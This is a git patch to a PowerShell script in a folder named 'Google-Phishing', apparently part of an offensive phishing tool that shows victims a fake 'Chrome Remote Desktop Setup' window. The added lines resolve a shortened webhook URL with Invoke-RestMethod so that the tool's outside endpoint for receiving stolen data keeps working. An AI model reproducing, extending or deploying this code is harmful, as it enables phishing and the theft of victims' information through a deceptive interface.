From 88b7e881b6b57ace3385563c93fcd580bd15abe7 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 2 Jan 2024 22:08:02 +0000 Subject: [PATCH] Update main.ps1 --- Google-Phishing/main.ps1 | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Google-Phishing/main.ps1 b/Google-Phishing/main.ps1 index a910b3d..e82c026 100644 --- a/Google-Phishing/main.ps1 +++ b/Google-Phishing/main.ps1 @@ -15,6 +15,9 @@ $memoryStream = New-Object IO.MemoryStream($imageBytes, 0, $imageBytes.Length) $memoryStream.Write($imageBytes, 0, $imageBytes.Length); $image = [System.Drawing.Image]::FromStream($memoryStream) +# shortened URL Detection +if ($dc.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $dc = (irm $dc).url} + $setupwindow = New-Object System.Windows.Forms.Form $setupwindow.ClientSize = '600,450' $setupwindow.Text = "Chrome Remote Desktop Setup"